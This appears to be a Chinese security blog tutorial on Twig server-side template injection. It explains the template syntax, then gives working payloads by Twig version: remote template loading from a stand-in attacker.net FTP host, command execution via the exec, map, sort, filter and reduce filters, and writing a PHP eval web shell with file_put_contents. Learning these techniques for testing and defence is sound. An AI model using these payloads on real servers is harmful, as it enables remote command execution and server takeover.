<div class="detail_content markdown-body editormd-preview-container" id="markdown-body">
<div id="app">
<h1 data-content="1" id="b0f53974f1f683666c410abde353ef4e">Twig模板注入：</h1>
<p>我们依然用上次那个图片来看一下：</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20230318212231-efb8428a-c58f-1.png"/></p>
<p>今天我们就来学习一下<code>Twig</code>模板引擎的注入：（网上的师傅写的很不错，结合了两三个来学习学习）</p>
<h2 data-content="1" id="05e67cae8f4e02aad435c72f3c0549f0">Twig模板基础语法：</h2>
<h3 data-content="1" id="0af59158ba9e6b090c0412930c06b734">变量：</h3>
<p>应用程序将变量传入模板中进行处理，变量可以包含你能访问的属性或元素。你可以使用 <code>.</code>来访问变量中的属性（方法或 PHP 对象的属性，或 PHP 数组单元），Twig还支持访问PHP数组上的项的特定语法， <code>foo['bar']</code>：</p>
<div class="highlight"><pre><span></span><span class="cp">{{</span> <span class="nv">foo.bar</span> <span class="cp">}}{{</span> <span class="nv">foo</span><span class="o">[</span><span class="s1">'bar'</span><span class="o">]</span> <span class="cp">}}</span><span class="x"></span>
</pre></div>
<h3 data-content="1" id="fdb7ff3934de0172e1eb7cfbcc620fcf">全局变量：</h3>
<p>在Twig模板中存在这些全局变量：</p>
<pre><code>_self：引用当前模板名称；（在twig1.x和2.x/3.x作用不一）
_context：引用当前上下文；
_charset：引用当前字符集。</code></pre>
<h3 data-content="1" id="da5bf4de03f0c19a18c25e192824a166">定义变量：</h3>
<p>可以为代码块内的变量赋值。赋值使用<code>set</code>标签：</p>
<div class="highlight"><pre><span></span><span class="cp">{%</span> <span class="k">set</span> <span class="nv">foo</span> <span class="o">=</span> <span class="s1">'foo'</span> <span class="cp">%}</span><span class="x"></span>
<span class="cp">{%</span> <span class="k">set</span> <span class="nv">foo</span> <span class="o">=</span> <span class="o">[</span><span class="m">1</span><span class="o">,</span> <span class="m">2</span><span class="o">]</span> <span class="cp">%}</span><span class="x"></span>
<span class="cp">{%</span> <span class="k">set</span> <span class="nv">foo</span> <span class="o">=</span> <span class="o">{</span><span class="s1">'foo'</span><span class="o">:</span> <span class="s1">'bar'</span><span class="o">}</span> <span class="cp">%}</span><span class="x"></span>
</pre></div>
<h3 data-content="1" id="e6fb8c7b46fe45afd06affcc2f9e6a4b">过滤器：</h3>
<p>变量可以修改为 <strong>过滤器</strong>. 过滤器与变量之间用管道符号隔开 (<code>|</code>). 可以链接多个过滤器。一个过滤器的输出应用于下一个过滤器。</p>
<p>下面的示例从 <code>name</code>标题是：</p>
<div class="highlight"><pre><span></span><span class="cp">{{</span> <span class="nv">name</span><span class="o">|</span><span class="nf">striptags</span><span class="o">|</span><span class="nf">title</span> <span class="cp">}}</span><span class="x"></span>
</pre></div>
<p>接受参数的筛选器在参数周围有括号。此示例通过逗号连接列表中的元素：</p>
<div class="highlight"><pre><span></span><span class="cp">{{</span> <span class="nv">list</span><span class="o">|</span><span class="nf">join</span> <span class="cp">}}</span><span class="x"></span>
<span class="cp">{{</span> <span class="nv">list</span><span class="o">|</span><span class="nf">join</span><span class="o">(</span><span class="s1">', '</span><span class="o">)</span> <span class="cp">}}</span><span class="x"></span>
<span class="cp">{{</span> <span class="o">[</span><span class="s1">'a'</span><span class="o">,</span> <span class="s1">'b'</span><span class="o">,</span> <span class="s1">'c'</span><span class="o">]|</span><span class="nf">join</span> <span class="cp">}}</span><span class="x"></span>
<span class="x">Output: abc</span>
<span class="cp">{{</span> <span class="o">[</span><span class="s1">'a'</span><span class="o">,</span> <span class="s1">'b'</span><span class="o">,</span> <span class="s1">'c'</span><span class="o">]|</span><span class="nf">join</span><span class="o">(</span><span class="s1">'|'</span><span class="o">)</span> <span class="cp">}}</span><span class="x"></span>
<span class="x">Output: a|b|c</span>
</pre></div>
<p>若要对代码部分应用筛选器，请使用<code>apply</code>标签：</p>
<div class="highlight"><pre><span></span><span class="cp">{%</span> <span class="k">apply</span> <span class="nv">upper</span> <span class="cp">%}</span><span class="x">This text becomes uppercase</span><span class="cp">{%</span> <span class="k">endapply</span> <span class="cp">%}</span><span class="x"></span>
</pre></div>
<h3 data-content="1" id="abebeed2ba16d8a91b188cb5c711619e">控制结构：</h3>
<p>控制结构是指所有控制程序流的东西-条件句<code>(即 if/elseif/else/ for)</code>循环，以及程序块之类的东西。控制结构出现在 <code>{{% ... %}}</code>中</p>
<p>例如，要显示在名为 <code>users</code>使用<code>for</code>标签：</p>
<div class="highlight"><pre><span></span><span class="x">&lt;h1&gt;Members&lt;/h1&gt;</span>
<span class="x">&lt;ul&gt;</span>
<span class="cp">{%</span> <span class="k">for</span> <span class="nv">user</span> <span class="k">in</span> <span class="nv">users</span> <span class="cp">%}</span><span class="x"></span>
<span class="x">&lt;li&gt;</span><span class="cp">{{</span> <span class="nv">user.username</span><span class="o">|</span><span class="nf">e</span> <span class="cp">}}</span><span class="x">&lt;/li&gt;</span>
<span class="cp">{%</span> <span class="k">endfor</span> <span class="cp">%}</span><span class="x"></span>
<span class="x">&lt;/ul&gt;</span>
</pre></div>
<p><code>if</code>标记可用于测试表达式：</p>
<div class="highlight"><pre><span></span><span class="cp">{%</span> <span class="k">if</span> <span class="nv">users</span><span class="o">|</span><span class="nf">length</span> <span class="o">&gt;</span> <span class="m">0</span> <span class="cp">%}</span><span class="x"></span>
<span class="x">&lt;ul&gt;</span>
<span class="cp">{%</span> <span class="k">for</span> <span class="nv">user</span> <span class="k">in</span> <span class="nv">users</span> <span class="cp">%}</span><span class="x"></span>
<span class="x">&lt;li&gt;</span><span class="cp">{{</span> <span class="nv">user.username</span><span class="o">|</span><span class="nf">e</span> <span class="cp">}}</span><span class="x">&lt;/li&gt;</span>
<span class="cp">{%</span> <span class="k">endfor</span> <span class="cp">%}</span><span class="x"></span>
<span class="x">&lt;/ul&gt;</span>
<span class="cp">{%</span> <span class="k">endif</span> <span class="cp">%}</span><span class="x"></span>
</pre></div>
<h3 data-content="1" id="d4667844b8fbc36d4b476d61974642aa">函数：</h3>
<div class="highlight"><pre><span></span><span class="x">在 Twig 模板中可以直接调用函数，用于生产内容。如下调用了 range()函数用来返回一个包含整数等差数列的列表：</span>
<span class="cp">{%</span> <span class="k">for</span> <span class="nv">i</span> <span class="k">in</span> <span class="nv">range</span><span class="o">(</span><span class="m">0</span><span class="o">,</span> <span class="m">3</span><span class="o">)</span> <span class="cp">%}</span><span class="x"></span>
<span class="cp">{{</span> <span class="nv">i</span> <span class="cp">}}</span><span class="x">,</span>
<span class="cp">{%</span> <span class="k">endfor</span> <span class="cp">%}</span><span class="x"></span>
<span class="x">// Output: 0, 1, 2, 3,</span>
</pre></div>
<h3 data-content="1" id="094d529d951fed5c99f6fa397e22bb00">注释：</h3>
<pre><code>{#……#}</code></pre>
<h3 data-content="1" id="302251a5dfb03ac971dc66acb785fe79">引入其他模板：</h3>
<p>Twig 提供的 <code>include</code>函数可以使你更方便地在模板中引入模板，并将该模板已渲染后的内容返回到当前模板</p>
<pre><code>{{ include('sidebar.html') }}</code></pre>
<h3 data-content="1" id="dbbc3e01997fcf09fbad31ff32ccdd51">继承：</h3>
<p>Twig最强大的部分是模板继承。模板继承允许您构建一个基本的“skeleton”模板，该模板包含站点的所有公共元素并定义子模版可以覆写的 blocks 块。</p>
<p>从一个例子开始更容易理解这个概念。</p>
<p>让我们定义一个基本模板， <code>base.html</code>，它定义了可用于两列页面的HTML框架文档：</p>
<div class="highlight"><pre><span></span><span class="x">&lt;!DOCTYPE html&gt;</span>
<span class="x">&lt;html&gt;</span>
<span class="x">&lt;head&gt;</span>
<span class="cp">{%</span> <span class="k">block</span> <span class="nv">head</span> <span class="cp">%}</span><span class="x"></span>
<span class="x">&lt;link rel="stylesheet" href="style.css"/&gt;</span>
<span class="x">&lt;title&gt;</span><span class="cp">{%</span> <span class="k">block</span> <span class="nv">title</span> <span class="cp">%}{%</span> <span class="k">endblock</span> <span class="cp">%}</span><span class="x"> - My Webpage&lt;/title&gt;</span>
<span class="cp">{%</span> <span class="k">endblock</span> <span class="cp">%}</span><span class="x"></span>
<span class="x">&lt;/head&gt;</span>
<span class="x">&lt;body&gt;</span>
<span class="x">&lt;div id="content"&gt;</span><span class="cp">{%</span> <span class="k">block</span> <span class="nv">content</span> <span class="cp">%}{%</span> <span class="k">endblock</span> <span class="cp">%}</span><span class="x">&lt;/div&gt;</span>
<span class="x">&lt;div id="footer"&gt;</span>
<span class="cp">{%</span> <span class="k">block</span> <span class="nv">footer</span> <span class="cp">%}</span><span class="x"></span>
<span class="x">&amp;copy; Copyright 2011 by &lt;a href="http://domain.invalid/"&gt;you&lt;/a&gt;.</span>
<span class="cp">{%</span> <span class="k">endblock</span> <span class="cp">%}</span><span class="x"></span>
<span class="x">&lt;/div&gt;</span>
<span class="x">&lt;/body&gt;</span>
<span class="x">&lt;/html&gt;</span>
</pre></div>
<p>在这个例子中，block标记定义了子模板可以填充的四个块。所有的 <code>block</code>标记的作用是告诉模板引擎子模板可能会覆盖模板的这些部分。</p>
<p>子模板可能如下所示：</p>
<div class="highlight"><pre><span></span><span class="cp">{%</span> <span class="k">block</span> <span class="nv">title</span> <span class="cp">%}</span><span class="x">Index</span><span class="cp">{%</span> <span class="k">endblock</span> <span class="cp">%}</span><span class="x"></span>
<span class="cp">{%</span> <span class="k">block</span> <span class="nv">head</span> <span class="cp">%}</span><span class="x"></span>
<span class="cp">{{</span> <span class="nb">parent</span><span class="o">()</span> <span class="cp">}}</span><span class="x"></span>
<span class="x">&lt;style type="text/css"&gt;</span>
<span class="x">.important { color: #336699; }</span>
<span class="x">&lt;/style&gt;</span>
<span class="cp">{%</span> <span class="k">endblock</span> <span class="cp">%}</span><span class="x"></span>
<span class="cp">{%</span> <span class="k">block</span> <span class="nv">content</span> <span class="cp">%}</span><span class="x"></span>
<span class="x">&lt;h1&gt;Index&lt;/h1&gt;</span>
<span class="x">&lt;p class="important"&gt;</span>
<span class="x">Welcome to my awesome homepage.</span>
<span class="x">&lt;/p&gt;</span>
<span class="cp">{%</span> <span class="k">endblock</span> <span class="cp">%}</span><span class="x"></span>
</pre></div>
<p>其中的 <code>extends</code>标签是关键所在，其必须是模板的第一个标签。<code>extends</code>标签告诉模板引擎当前模板扩展自另一个父模板，当模板引擎评估编译这个模板时，首先会定位到父模板。由于子模版未定义并重写 <code>footer</code>块，就用来自父模板的值替代使用了。</p>
<h2 data-content="1" id="784d01e69d07ddb83e6cf40e120947a4">Twig模板注入原理：</h2>
<p>我们来看一段Twig代码：</p>
<div class="highlight"><pre><span></span><span class="x">require_once dirname(__FILE__).'/../lib/Twig/Autoloader.php';</span>
<span class="x">Twig_Autoloader::register(true);</span>
<span class="x">$twig = new Twig_Environment(new Twig_Loader_String());</span>
<span class="x">$output = $twig-&gt;render("Hello {{name}}", array("name" =&gt; $_GET["name"]));  </span>
<span class="x">// 将用户输入作为模版变量的值</span>
<span class="x">echo $output;</span>
</pre></div>
<p>这里我们使用PHP模板引擎Twig作为实例，用这个代码来说明Twig语言的模板注入是怎么进行的。</p>
<p>这段代码使用Twig模板引擎来呈现一个字符串模板，并将$_GET["name"]的值作为模板变量“name”的值。具体来说：</p>
<ul>
<li>第一行使用PHP的require_once语句引入Twig的自动加载器。</li>
<li>第二行调用Twig_Autoloader::register(true)来注册Twig自动加载器。</li>
<li>第三行创建一个Twig_Environment实例，使用Twig_Loader_String作为模板的加载器。</li>
<li>第四行使用Twig_Environment实例的render()方法渲染模板，将$_GET["name"]的值作为模板变量“name”的值传递。</li>
<li>最后一行使用echo语句将渲染结果输出到浏览器中。</li>
</ul>
<p>我们看到这个地方用户与服务器所接触的get参数会直接传送至{{}}里面，然后被模板引擎所定义的模板变量进行编码和转义，所以这里并不会产生什么漏洞</p>
<p>而下面这个代码我们再来进行一下对比：</p>
<div class="highlight"><pre><span></span><span class="x">require_once dirname(__FILE__).'/../lib/Twig/Autoloader.php';</span>
<span class="x">Twig_Autoloader::register(true);</span>
<span class="x">$twig = new Twig_Environment(new Twig_Loader_String());</span>
<span class="x">$output = $twig-&gt;render("Hello {$_GET['name']}");  // 将用户输入作为模版内容的一部分echo $output;</span>
</pre></div>
<p>我们看到这个地方将get传值拼接到了字符串里面去，然后直接用twig模板引擎中的render进行渲染，我们可以发现用户输入的内容作为了模板的一部分，会原样输出用户所输入的内容，这样的话就会将用户所输入的内容进行模板编译和解析，最后在进行输出。</p>
<h2 data-content="1" id="7323d7c98ff5e351babc76048f745694">Twig模板注入检测：</h2>
<p>在 Twig 模板引擎里，{{ var }} 除了可以输出传递的变量以外，还能执行一些基本的表达式然后将其结果作为该模板变量的值，例如这里用户输入 name={{2*10}} ，则在服务端拼接的模版内容为：</p>
<div class="highlight"><pre><span></span><span class="x">Hello {{2*10}}</span>
</pre></div>
<p>Twig 模板引擎在编译模板的过程中会计算 <code>{{2*10}}</code>中的表达式，会将其返回值 20 作为模板变量的值输出</p>
<p>现在把测试的数据改变一下，插入一些正常字符和 Twig 模板引擎默认的注释符，构造 Payload 为：</p>
<div class="highlight"><pre><span></span><span class="x">IsVuln{# comment #}{{2*8}}OK</span>
</pre></div>
<p>实际服务端要进行编译的模板就被构造为：</p>
<div class="highlight"><pre><span></span><span class="x">Hello IsVuln{# comment #}{{2*8}}OK</span>
</pre></div>
<p>这里简单分析一下，由于 {# comment #} 作为 Twig 模板引擎的默认注释形式，所以在前端输出的时候并不会显示，而 {{2*8}} 作为模板变量最终会返回 16 作为其值进行显示，因此前端最终会返回内容 Hello IsVuln16OK</p>
<p>所以我们继续回到上面最开始的那个图：</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20230318212257-ff3c1024-c58f-1.png"/></p>
<h2 data-content="1" id="db13c6db62f921f8620f610fb899066a">版本漏洞:</h2>
<h3 data-content="1" id="28ff9648fd771350000fad44cc738214">Twig1.x:</h3>
<ul>
<li>index.php</li>
</ul>
<div class="highlight"><pre><span></span><span class="cp">&lt;?php</span>

<span class="k">include</span> <span class="no">__DIR__</span><span class="o">.</span><span class="s1">'/vendor/twig/twig/lib/Twig/Autoloader.php'</span><span class="p">;</span>
<span class="nx">Twig_Autoloader</span><span class="o">::</span><span class="na">register</span><span class="p">();</span>

<span class="nv">$loader</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">Twig_Loader_String</span><span class="p">();</span>
<span class="nv">$twig</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">Twig_Environment</span><span class="p">(</span><span class="nv">$loader</span><span class="p">);</span>
<span class="k">echo</span> <span class="nv">$twig</span><span class="o">-&gt;</span><span class="na">render</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]);</span>
<span class="cp">?&gt;</span><span class="x"></span>
</pre></div>
<p>在 Twig 1.x 中存在三个全局变量：</p>
<ul>
<li>
<code>_self</code>：引用当前模板的实例。</li>
<li>
<code>_context</code>：引用当前上下文。</li>
<li>
<code>_charset</code>：引用当前字符集。</li>
</ul>
<p>对应的代码是：</p>
<div class="highlight"><pre><span></span><span class="x">protected $specialVars = [</span>
<span class="x">        '_self' =&gt; '$this',</span>
<span class="x">        '_context' =&gt; '$context',</span>
<span class="x">        '_charset' =&gt; '$this-&gt;env-&gt;getCharset()',</span>
<span class="x">    ];</span>
</pre></div>
<p>这里主要就是利用 <code>_self</code> 变量，它会返回当前 <code>\Twig\Template</code> 实例，并提供了指向 <code>Twig_Environment</code> 的 <code>env</code> 属性，这样我们就可以继续调用 <code>Twig_Environment</code> 中的其他方法，从而进行 SSTI。</p>
<p>比如以下 Payload 可以调用 <code>setCache</code> 方法改变 Twig 加载 PHP 文件的路径，在 <code>allow_url_include</code> 开启的情况下我们可以通过改变路径实现远程文件包含：</p>
<div class="highlight"><pre><span></span><span class="cp">{{</span><span class="nv">_self.env.setCache</span><span class="o">(</span><span class="s2">"ftp://attacker.net:2121"</span><span class="o">)</span><span class="cp">}}{{</span><span class="nv">_self.env.loadTemplate</span><span class="o">(</span><span class="s2">"backdoor"</span><span class="o">)</span><span class="cp">}}</span><span class="x"></span>
</pre></div>
<p>此外还有 <code>getFilter</code> 方法：</p>
<div class="highlight"><pre><span></span><span class="x">public function getFilter($name)</span>
<span class="x">  {</span>
<span class="x">    ...</span>
<span class="x">    foreach ($this-&gt;filterCallbacks as $callback) {</span>
<span class="x">    if (false !== $filter = call_user_func($callback, $name)) {</span>
<span class="x">      return $filter;</span>
<span class="x">    }</span>
<span class="x">  }</span>
<span class="x">  return false;</span>
<span class="x">}</span>

<span class="x">public function registerUndefinedFilterCallback($callable)</span>
<span class="x">{</span>
<span class="x">  $this-&gt;filterCallbacks[] = $callable;</span>
<span class="x">}</span>
</pre></div>
<p>我们在 <code>getFilter</code> 里发现了危险函数 <code>call_user_func</code>。通过传递参数到该函数中，我们可以调用任意 PHP 函数。Payload 如下：</p>
<div class="highlight"><pre><span></span><span class="cp">{{</span><span class="nv">_self.env.registerUndefinedFilterCallback</span><span class="o">(</span><span class="s2">"exec"</span><span class="o">)</span><span class="cp">}}{{</span><span class="nv">_self.env.getFilter</span><span class="o">(</span><span class="s2">"id"</span><span class="o">)</span><span class="cp">}}</span><span class="x"></span>
</pre></div>
<h3 data-content="1" id="6b2dd350238bf1cfa6c18c4bd5c55ccd">Twig2.x&amp;Twig3.x:</h3>
<p>这里看到一个通杀版本的payload，来学习一下：</p>
<h4 data-content="1" id="986433c52faaf2113ebb4d3ba6bd5527">Map：</h4>
<div class="highlight"><pre><span></span><span class="cp">{{</span><span class="o">[</span><span class="s2">"id"</span><span class="o">]|</span><span class="nf">map</span><span class="o">(</span><span class="s2">"system"</span><span class="o">)|</span><span class="nf">join</span><span class="o">(</span><span class="s2">","</span><span class="o">)</span>
</pre></div>
<p>我们去官网找一下map的用法：</p>
<div class="highlight"><pre><span></span><span class="cp">{%</span> <span class="k">set</span> <span class="nv">people</span> <span class="o">=</span> <span class="o">[</span>
    <span class="o">{</span><span class="nv">first</span><span class="o">:</span> <span class="s2">"Bob"</span><span class="o">,</span><span class="nv">last</span><span class="s2">:"Smith"</span><span class="o">},</span>
    <span class="o">{</span><span class="nv">first</span><span class="o">:</span> <span class="s2">"Alice"</span><span class="o">,</span><span class="nv">last</span><span class="s2">:"A"</span><span class="o">},</span>
<span class="o">]</span> <span class="cp">%}</span><span class="x"></span>

<span class="cp">{{</span><span class="nv">people</span><span class="o">|</span><span class="nf">map</span><span class="o">(</span><span class="nv">p</span> <span class="o">=&gt;</span> <span class="s2">"#{p.first} #{p.last}"</span><span class="o">)|</span><span class="nf">join</span><span class="o">(</span><span class="s1">', '</span><span class="o">)</span><span class="cp">}}</span><span class="x"></span>
<span class="c">{# output Bob Smith, Alice A #}</span><span class="x"></span>
</pre></div>
<p>允许用户传一个<code>arrow function， arrow function</code>最后会变成一个<code>closure</code></p>
<p>举个例子</p>
<div class="highlight"><pre><span></span><span class="cp">{{</span><span class="o">[</span><span class="s2">"man"</span><span class="o">]|</span><span class="nf">map</span><span class="o">((</span><span class="nv">arg</span><span class="o">)=&gt;</span><span class="s2">"hello #{arg}"</span><span class="o">)</span><span class="cp">}}</span><span class="x"></span>
</pre></div>
<p>会被编译成</p>
<div class="highlight"><pre><span></span><span class="x">twig_array_map([0 =&gt; "man"], function ($__arg__) use ($context, $macros) { $context["arg"] = $__arg__; return ("hello " . ($context["arg"] ?? null))</span>
</pre></div>
<p><code>map</code> 对应的函数是<code>twig_array_map</code> ,下面是其实现</p>
<div class="highlight"><pre><span></span><span class="x">function twig_array_map($array, $arrow)</span>
<span class="x">{</span>
<span class="x">    $r = [];</span>
<span class="x">    foreach ($array as $k =&gt; $v) {</span>
<span class="x">        $r[$k] = $arrow($v, $k);//将arrow当作函数来进行执行</span>
<span class="x">    }</span>

<span class="x">    return $r;</span>
<span class="x">}</span>
</pre></div>
<ul>
<li>从上面的代码我们可以看到，传入的 <code>$arrow</code> 直接就被当成函数执行，即 <code>$arrow($v, $k)</code>，而 <code>$v</code> 和 <code>$k</code> 分别是 <code>$array</code> 中的 value 和 key。<code>$array</code> 和 <code>$arrow</code> 都是我们我们可控的，那我们可以不传箭头函数，直接传一个可传入两个参数的、能够命令执行的危险函数名即可实现命令执行。通过查阅常见的命令执行函数：</li>
</ul>
<div class="highlight"><pre><span></span><span class="x">system ( string $command [, int &amp;$return_var ] ) : string</span>
<span class="x">passthru ( string $command [, int &amp;$return_var ] )</span>
<span class="x">exec ( string $command [, array &amp;$output [, int &amp;$return_var ]] ) : string</span>
<span class="x">shell_exec ( string $cmd ) : string</span>
</pre></div>
<ul>
<li>前三个都可以使用。相应的 Payload 如下：</li>
</ul>
<div class="highlight"><pre><span></span><span class="x">{{["id"]|map("system")}}</span>
<span class="x">{{["id"]|map("passthru")}}</span>
<span class="x">{{["id"]|map("exec")}}    // 无回显</span>
</pre></div>
<ul>
<li>其中，<code>{{["id"]|map("system")}}</code> 会被成下面这样：</li>
</ul>
<div class="highlight"><pre><span></span><span class="x">twig_array_map([0 =&gt; "id"], "sysetm")</span>
</pre></div>
<ul>
<li>
<p>最终在 <code>twig_array_map</code> 函数中将执行 <code>system('id',0)</code>。</p>
</li>
<li>
<p>还有<code>file_put_contents</code>函数写文件：</p>
<div class="highlight"><pre><span></span><span class="x">file_put_contents ( string $filename , mixed $data [, int $flags = 0 [, resource $context ]] ) : int</span>
</pre></div>
<p>当我们找到路径后就可以利用该函数进行写shell了</p>
<div class="highlight"><pre><span></span><span class="x">?name={{{"</span><span class="cp">&lt;?php</span> <span class="nb">phpinfo</span><span class="p">();</span><span class="k">eval</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="nx">whoami</span><span class="p">]);</span><span class="s2">":"</span><span class="nx">D</span><span class="o">:</span><span class="nx">\\phpstudy_pro\\WWW\\shell</span><span class="o">.</span><span class="nx">php</span><span class="s2">"}|map("</span><span class="nb">file_put_contents</span><span class="s2">")}}</span>
</pre></div>
<p>####</p>
</li>
</ul>
<h4 data-content="1" id="52e45b20c807cbef09b8b6e1dc881c34">sort：</h4>
<ul>
<li>这个 <code>sort</code> 筛选器可以用来对数组排序。</li>
</ul>
<div class="highlight"><pre><span></span><span class="x">{% for user in users|sort %}</span>
<span class="x">    ...</span>
<span class="x">{% endfor %}</span>
</pre></div>
<ul>
<li>传递一个箭头函数来对数组进行排序：</li>
</ul>
<div class="highlight"><pre><span></span><span class="x">{% set fruits = [</span>
<span class="x">    { name: 'Apples', quantity: 5 },</span>
<span class="x">    { name: 'Oranges', quantity: 2 },</span>
<span class="x">    { name: 'Grapes', quantity: 4 },</span>
<span class="x">]</span>

<span class="x">%}</span>

<span class="x">{% for fruit in fruits|sort((a, b) =&gt; a.quantity &lt;=&gt; b.quantity)|column('name') %}</span>
<span class="x">    {{ fruit }}</span>
<span class="x">{% endfor %}</span>
<span class="x">// Output in this order: Oranges, Grapes, Apples</span>
</pre></div>
<ul>
<li>类似于 <code>map</code>，模板编译的过程中会进入 <code>twig_sort_filter</code> 函数，这个 <code>twig_sort_filter</code> 函数的源码如下：</li>
</ul>
<div class="highlight"><pre><span></span><span class="x">function twig_sort_filter($array, $arrow = null)</span>
<span class="x">{</span>
<span class="x">    if ($array instanceof \Traversable) {</span>
<span class="x">        $array = iterator_to_array($array);</span>
<span class="x">    } elseif (!\is_array($array)) {</span>
<span class="x">        throw new RuntimeError(sprintf('The sort filter only works with arrays or "Traversable", got "%s".', \gettype($array)));</span>
<span class="x">    }</span>

<span class="x">    if (null !== $arrow) {</span>
<span class="x">        uasort($array, $arrow);    // 直接被 uasort 调用 </span>
<span class="x">    } else {</span>
<span class="x">        asort($array);</span>
<span class="x">    }</span>

<span class="x">    return $array;</span>
<span class="x">}</span>
</pre></div>
<ul>
<li>从源码中可以看到，<code>$array</code> 和 <code>$arrow</code> 直接被 <code>uasort</code> 函数调用。众所周知 <code>uasort</code> 函数可以使用用户自定义的比较函数对数组中的元素按键值进行排序，如果我们自定义一个危险函数，将造成代码执行或命令执行：</li>
</ul>
<div class="highlight"><pre><span></span><span class="x">php &gt; $arr = ["id",0];</span>
<span class="x">php &gt; usort($arr,"system");</span>
<span class="x">uid=0(root) gid=0(root) groups=0(root)</span>
<span class="x">php &gt;</span>
</pre></div>
<ul>
<li>知道了做这些我们便可以构造 Payload 了：</li>
</ul>
<div class="highlight"><pre><span></span><span class="x">{{["id", 0]|sort("system")}}</span>
<span class="x">{{["id", 0]|sort("passthru")}}</span>
<span class="x">{{["id", 0]|sort("exec")}}    // 无回显</span>
</pre></div>
<h4 data-content="1" id="adb3c2e060273986f03144f7957c821c">filter:</h4>
<ul>
<li>这个 <code>filter</code> 过滤器使用箭头函数来过滤序列或映射中的元素。箭头函数用于接收序列或映射的值：</li>
</ul>
<div class="highlight"><pre><span></span><span class="x">{% set lists = [34, 36, 38, 40, 42] %}</span>
<span class="x">{{ lists|filter(v =&gt; v &gt; 38)|join(', ') }}</span>

<span class="x">// Output: 40, 42</span>
</pre></div>
<ul>
<li>类似于 <code>map</code>，模板编译的过程中会进入 <code>twig_array_filter</code> 函数，这个 <code>twig_array_filter</code> 函数的源码如下：</li>
</ul>
<div class="highlight"><pre><span></span><span class="x">function twig_array_filter($array, $arrow)</span>
<span class="x">{</span>
<span class="x">    if (\is_array($array)) {</span>
<span class="x">        return array_filter($array, $arrow, \ARRAY_FILTER_USE_BOTH);    // $array 和 $arrow 直接被 array_filter 函数调用</span>
<span class="x">    }</span>

<span class="x">    // the IteratorIterator wrapping is needed as some internal PHP classes are \Traversable but do not implement \Iterator</span>
<span class="x">    return new \CallbackFilterIterator(new \IteratorIterator($array), $arrow);</span>
<span class="x">}</span>
</pre></div>
<ul>
<li>从源码中可以看到，<code>$array</code> 和 <code>$arrow</code> 直接被 <code>array_filter</code> 函数调用。 <code>array_filter</code> 函数可以用回调函数过滤数组中的元素，如果我们自定义一个危险函数，将造成代码执行或命令执行：</li>
</ul>
<div class="highlight"><pre><span></span><span class="x">php &gt; $arr = ["id"];</span>
<span class="x">php &gt; array_filter($arr,"system");</span>
<span class="x">uid=0(root) gid=0(root) groups=0(root)</span>
<span class="x">php &gt;</span>
</pre></div>
<h4 data-content="1" id="72256cb5df99f279808001c13a7202e3">reduce：</h4>
<p>这个 <code>reduce</code>filter使用arrow函数迭代地将序列或映射缩减为单个值，从而将其缩减为单个值。arrow函数接收上一次迭代的返回值和序列或映射的当前值：</p>
<div class="highlight"><pre><span></span><span class="x">{% set numbers = [1, 2, 3] %}</span>

<span class="x">{{ numbers|reduce((carry, v) =&gt; carry + v) }}</span>
<span class="x">{# output 6 #}</span>
</pre></div>
<p>这个 <code>reduce</code>过滤器需要 <code>initial</code>值作为第二个参数：</p>
<div class="highlight"><pre><span></span><span class="x">{{ numbers|reduce((carry, v) =&gt; carry + v, 10) }}</span>
<span class="x">{# output 16 #}</span>
</pre></div>
<p>注意arrow函数可以访问当前上下文。</p>
<div class="highlight"><pre><span></span><span class="x">function twig_array_reduce($array, $arrow, $initial = null)</span>
<span class="x">{</span>
<span class="x">if (!\is_array($array)) {</span>
<span class="x">$array = iterator_to_array($array);</span>
<span class="x">}</span>
<span class="x">return array_reduce($array, $arrow, $initial);    </span>
<span class="x">// $array, $arrow 和 $initial 直接被 array_reduce 函数调用</span>
<span class="x">}</span>
</pre></div>
<p>可以看到<code>array_reduce</code>是有三个参数的:<code>$array</code>和 <code>$arrow</code>直接被 <code>array_filter</code>函数调用，我们可以利用该性质自定义一个危险函数从而达到rce</p>
<p>payload:<br/>
{{[0, 0]|reduce("system", "id")}}<br/>
{{[0, 0]|reduce("passthru", "id")}}<br/>
{{[0, 0]|reduce("exec", "id")}}    // 无回显</p>
<p>参考文章：<br/>
<a href="http://www.milan100.com/article/show/1547" target="_blank">http://www.milan100.com/article/show/1547</a><br/>
<a href="https://freebuf.com/articles/web/314028.html" target="_blank">https://freebuf.com/articles/web/314028.html</a><br/>
<a href="https://xz.aliyun.com/t/7518#toc-5" target="_blank">https://xz.aliyun.com/t/7518#toc-5</a><br/>
<a href="https://ppfocus.com/0/te3772380.html" target="_blank">https://ppfocus.com/0/te3772380.html</a></p>
</div>
</div>